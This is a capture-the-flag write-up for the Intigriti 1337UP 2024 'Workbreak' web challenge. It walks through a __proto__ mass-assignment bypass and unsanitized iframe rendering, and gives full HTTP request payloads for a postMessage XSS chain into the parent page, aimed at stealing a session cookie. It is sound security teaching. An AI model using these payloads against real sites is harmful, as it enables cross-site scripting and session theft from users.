---
title: "Intigriti 1337 2024 - Workbreak"
date: 2024-11-18T23:15:48+01:00
draft: false
categories:
    - CTF
tags:
    - XSS
    - Mass Assign
    - iframe
---

# Intigriti 1337UP LIVE CTF

Name  |  URL
--------|---- 
**Intigriti 0123**| **https://ctftime.org/event/2446**

> Your work portal contains multiple web vulnerabilities. Can you identify them and extract the session cookie of a support team member?

# REVIEW

We are analyzing a black box web application where users can create accounts and modify their settings:

```js
POST /api/user/settings HTTP/2
Host: workbreak-0.ctf.intigriti.io

{
  "name": "Anon",
  "phone": "1111111111",
  "position": "unemployed"
}
```

This user data is stored in the `/api/user/profile/${userId}` API endpoint. On the frontend, we find a `DOMContentLoaded` event listener that retrieves the user's profile JSON from the API and assigns its values to various fields:

```js
emailField.value = profileData.email;
nameField.value = userSettings.name;
phoneField.value = userSettings.phone;
positionField.value = userSettings.position;

userTasks = userSettings.tasks || [];
performanceIframe.addEventListener("load", () => {
    performanceIframe.contentWindow.postMessage(userTasks, "*");
});
```

The `userTasks` variable, if present in the API response, is sent to an iframe via postMessage. The iframe processes this data as follows:

```js
window.addEventListener(
    "message",
    (event) => {
        if (event.source !== window.parent) return;
        renderPerformanceChart(event.data);
    },
    false
);
```

The `renderPerformanceChart` function uses the `userTasks` argument as follows:

```js
const renderPerformanceChart = (taskData) => {

    // ...

    const taskCounts = generateTaskHeatmapData(taskData);
    const today = new Date().toISOString().split("T")[0];
    const todayTask = taskData.find((task) => task.date === today);

    const todayTasksDiv = d3.select("#todayTasks");
    if (todayTask) {
        todayTasksDiv.html(`Tasks Completed Today: ${todayTask.tasksCompleted}`);
    } else {
        todayTasksDiv.html("Tasks Completed Today: 0");
    }
```

We notice that the `todayTasksDiv` HTML is updated without sanitization, leading to XSS within the child iframe.

# EXPLOIT

To achieve XSS we should set the `userTasks` field:

```json
POST /api/user/settings HTTP/2
Host: workbreak-0.ctf.intigriti.io

{"name":"Anon","phone":"1111111111","position":"unemployed",
"tasks": []}
```

Using the trivial attempt to set `tasks` endpoint fails with the following response: 

```json
{"error":"Not Allowed to Modify Tasks"}
```

If we remember, `profile.js` mass assigns the response from the API:

```js
const userSettings = Object.assign(
    { name: "", phone: "", position: "" },
    profileData.assignedInfo
);
```

We realize that the code is mass assigning so we can take approach of this using `__proto__` and setting value to `tasks`. It is important to notice that something as the following won't work:

```js
apiResponse = {
    "email": "test@test.test",
    "assignedInfo": {
      "name": "Anon",
      "phone": "1111111111",
      "position": "unemployed",
      "__proto__": {
        "tasks": "hello"
      }
    },
    "ownProfile": true
  }

const userSettings1 = Object.assign(
    { name: "", phone: "", position: "" },
    apiResponse.assignedInfo
);

// undefined
console.log(userSettings1.tasks);
```

If the json is not json parsed the `__proto__` key will be skipped, if we parse it using `JSON.parse` it will work:

```js
apiResponse = JSON.parse(`{
    "email": "test@test.test",
    "assignedInfo": {
      "name": "Anon",
      "phone": "1111111111",
      "position": "unemployed",
      "__proto__": {
        "tasks": "hello"
      }
    },
    "ownProfile": true
  }`)

const userSettings1 = Object.assign(
    { name: "", phone: "", position: "" },
    apiResponse.assignedInfo
);

// hello
console.log(userSettings1.tasks);
```

In the challenge code we can see that the response is json parsed so the payload will work:

```js
const profileData = await response.json()
```

Back to the `performance_chart.js` code, the task shown is the one with the date value of today and then the `todayTask.tasksCompleted` content is reflected:

```js
 const todayTask = taskData.find((task) => task.date === today);

const todayTasksDiv = d3.select("#todayTasks");
if (todayTask) {
    todayTasksDiv.html(`Tasks Completed Today: ${todayTask.tasksCompleted}`);
}
```

Today's date is determined by:

```js
new Date().toISOString().split("T")[0];
```

And send the payload:

```json
POST /api/user/settings HTTP/2
Host: workbreak-0.ctf.intigriti.io


{
  "name": "Anon",
  "phone": "1111111111",
  "position": "unemployed",
  "__proto__": {
    "tasks": [
      {
        "date": "2024-11-17",
        "tasksCompleted": "<img src=x onerror=alert(1)>"
      }
    ]
  }
}
```

![<- Not working](/static/HACKING/workbreak-1.png)

However, this approach fails. Upon inspecting the browser console, we find the following error:

```
Ignored call to 'alert()'. The document is sandboxed, and the 'allow-modals' keyword is not set.
```

The iframe is sandboxed without the `allow-same-origin` flag, preventing access to parent iframe data (such as cookies). However, we can use postMessage to interact with the parent window, as shown in `profile.js`:

```js
// Not fully implemented - total tasks
window.addEventListener(
    "message",
    (event) => {
        if (event.source !== frames[0]) return;

        document.getElementById(
            "totalTasks"
        ).innerHTML = `<p>Total tasks completed: ${event.data.totalTasks}</p>`;
    },
    false
);
```

Let's test it in the dev tools console setting the context to `performance.html` running `postMessage` to the parent window:

![<- Not working](/static/HACKING/workbreak-2.png)

This confirms that XSS is achievable via `postMessage`.

We modify the payload to use `postMessage` from the iframe to the parent window:

```json
POST /api/user/settings HTTP/2
Host: workbreak-0.ctf.intigriti.io

{
  "name": "Anon",
  "phone": "1111111111",
  "position": "unemployed",
  "__proto__": {
    "tasks": [
      {
        "date": "2024-11-19",
        "tasksCompleted": "<img src=\"x\" onerror=\"window.parent.postMessage({'totalTasks': '<img src=\\'x\\' onerror=\\'alert(1)\\''}, '*')\">"
      }
    ]
  }
}
```

When the malicious task data is processed, the `tasksCompleted` field triggers the `postMessage` function, resulting in XSS on the parent page.